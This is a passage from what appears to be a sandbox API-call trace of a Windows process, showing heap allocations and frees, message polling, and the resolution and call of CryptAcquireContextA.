wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f38c) returned 0 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81d18 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78978 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc00 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b40 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecbd8 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aec8 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb60 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af40 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecbb0 | out: hHeap=0xc60000) returned 1 [0255.559] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecbb0 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af40 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b70 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af40 | out: hHeap=0xc60000) returned 1 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb60 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af40 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aec8 [0255.559] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b40 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aec8 | out: hHeap=0xc60000) returned 1 [0255.559] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b40 | out: hHeap=0xc60000) returned 1 [0255.560] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecbd8 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aec8 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b40 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78978 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae98 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.560] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae98 | out: hHeap=0xc60000) returned 1 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc00 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae98 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.560] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.560] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78948 [0255.560] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81d18 [0255.561] PeekMessageW (in: lpMsg=0x87ef94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef94) returned 0 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b10 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b00 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81d18 | out: hHeap=0xc60000) returned 1 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78948 | out: hHeap=0xc60000) returned 1 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78948 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae50 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae68 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78918 [0255.561] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae20 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.561] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae38 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe788e8 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7adf0 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ae08 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe788b8 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7adc0 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7add8 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81d18 [0255.562] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc00 | out: hHeap=0xc60000) returned 1 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78888 [0255.562] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.563] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad90 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ada8 [0255.563] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78858 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.563] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad60 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad78 [0255.563] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78828 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.563] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b20 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad30 [0255.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.563] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b00 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc00 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b00 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4af0 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.564] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4af0 | out: hHeap=0xc60000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4af0 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ae0 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ae0 | out: hHeap=0xc60000) returned 1 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ae0 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ad0 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.565] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ad0 | out: hHeap=0xc60000) returned 1 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ad0 [0255.565] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ac0 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.566] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.566] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.566] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.566] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ac0 | out: hHeap=0xc60000) returned 1 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ac0 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ab0 [0255.566] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.566] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.567] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.567] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.567] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ab0 | out: hHeap=0xc60000) returned 1 [0255.567] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.567] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ab0 [0255.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.567] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xec2028 [0255.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0xec2028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0255.567] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.567] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc28 [0255.567] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.568] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0255.568] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc28 | out: hHeap=0xc60000) returned 1 [0255.568] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ab0 | out: hHeap=0xc60000) returned 1 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ab0 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x15) returned 0xec2028 [0255.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0xec2028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0255.568] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.568] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc28 [0255.568] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.569] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc28 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ab0 | out: hHeap=0xc60000) returned 1 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecc28 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ab0 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b10 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4a90 [0255.569] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4a80 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ab0 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b10 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a90 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.569] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc28 | out: hHeap=0xc60000) returned 1 [0255.569] CryptAcquireContextA (in: phProv=0x87ef68, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ef68*=0xcc2d90) returned 1 [0255.571] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4a90 [0255.571] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xefe3d0 [0255.571] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2008 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad00 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad00 | out: hHeap=0xc60000) returned 1 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787f8 | out: hHeap=0xc60000) returned 1 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787f8 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad00 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad18 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad18 | out: hHeap=0xc60000) returned 1 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad00 | out: hHeap=0xc60000) returned 1 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad00 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad18 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787c8 [0255.572] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787c8 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad18 | out: hHeap=0xc60000) returned 1 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad18 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787c8 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7acd0 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7acd0 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787c8 | out: hHeap=0xc60000) returned 1 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe787c8 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7acd0 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ace8 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ace8 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.573] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7acd0 | out: hHeap=0xc60000) returned 1 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7acd0 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ace8 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78798 [0255.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4aa0 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78798 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4aa0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ace8 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4af0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ae0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ad0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ac0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecc00 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: 